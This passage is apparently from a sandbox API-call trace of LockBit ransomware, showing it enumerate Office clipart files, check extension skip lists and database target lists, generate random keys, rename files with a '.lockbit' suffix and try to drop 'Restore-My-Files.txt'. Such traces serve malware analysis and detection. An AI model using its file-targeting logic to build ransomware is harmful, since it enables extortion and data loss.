(lpString1="autorun.inf", lpString2="FD00419_.WMF") returned -1 [0114.113] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00419_.WMF") returned 1 [0114.113] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00419_.WMF") returned 1 [0114.113] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.113] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF") returned=".WMF" [0114.113] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.113] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.113] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.114] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.114] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.lockbit") returned 72 [0114.114] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00419_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0114.115] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.115] malloc (_Size=0x40068) returned 0x3ef0008 [0114.115] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=16396) returned 1 [0114.115] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0114.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.116] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.116] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0114.116] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.122] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.122] malloc (_Size=0xa6) returned 0x77d7a8 [0114.122] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.123] free (_Block=0x77d7a8) [0114.123] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00419_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.123] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.123] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.123] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa86d2a00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa86d2a00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x12bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00428_.WMF", cAlternateFileName="")) returned 1 [0114.123] lstrcmpiW (lpString1=".", lpString2="FD00428_.WMF") returned -1 [0114.123] lstrcmpiW (lpString1="..", lpString2="FD00428_.WMF") returned -1 [0114.123] PathFindExtensionW (pszPath="FD00428_.WMF") returned=".WMF" [0114.123] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.123] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.123] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.124] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.125] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.125] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00428_.WMF") returned 1 [0114.126] lstrcmpiW (lpString1="ntldr", lpString2="FD00428_.WMF") returned 1 [0114.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00428_.WMF") returned 1 [0114.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00428_.WMF") returned -1 [0114.126] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00428_.WMF") returned -1 [0114.126] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00428_.WMF") returned 1 [0114.126] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00428_.WMF") returned 1 [0114.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF") returned=".WMF" [0114.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.126] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.126] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.127] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.128] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.128] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.128] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.128] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.128] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.128] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.lockbit") returned 72 [0114.128] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00428_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0114.129] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.129] malloc (_Size=0x40068) returned 0x3d70450 [0114.130] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=4796) returned 1 [0114.130] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0114.131] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.131] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.131] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0114.132] ReadFile (in: hFile=0x13c0, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0114.137] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.137] malloc (_Size=0xa6) returned 0x77d7a8 [0114.137] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.138] free (_Block=0x77d7a8) [0114.138] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00428_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.138] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.138] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.138] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa73bfd00, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x5226a510, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa73bfd00, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x83c, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00435_.WMF", cAlternateFileName="")) returned 1 [0114.138] lstrcmpiW (lpString1=".", lpString2="FD00435_.WMF") returned -1 [0114.138] lstrcmpiW (lpString1="..", lpString2="FD00435_.WMF") returned -1 [0114.138] PathFindExtensionW (pszPath="FD00435_.WMF") returned=".WMF" [0114.138] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.139] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.140] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.140] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00435_.WMF") returned 1 [0114.141] lstrcmpiW (lpString1="ntldr", lpString2="FD00435_.WMF") returned 1 [0114.141] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00435_.WMF") returned 1 [0114.141] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00435_.WMF") returned -1 [0114.141] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00435_.WMF") returned -1 [0114.141] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00435_.WMF") returned 1 [0114.141] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00435_.WMF") returned 1 [0114.141] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.141] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF") returned=".WMF" [0114.141] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.141] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.141] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.142] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.142] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.lockbit") returned 72 [0114.143] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00435_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0114.155] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.155] malloc (_Size=0x40068) returned 0x1ff1e60 [0114.155] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=2108) returned 1 [0114.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0114.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0114.157] ReadFile (in: hFile=0x340, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0114.171] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.171] malloc (_Size=0xa6) returned 0x77d7a8 [0114.171] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.172] free (_Block=0x77d7a8) [0114.172] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00435_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.172] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.173] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.173] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa60ad000, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x60c23530, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa60ad000, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x13ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00438_.WMF", 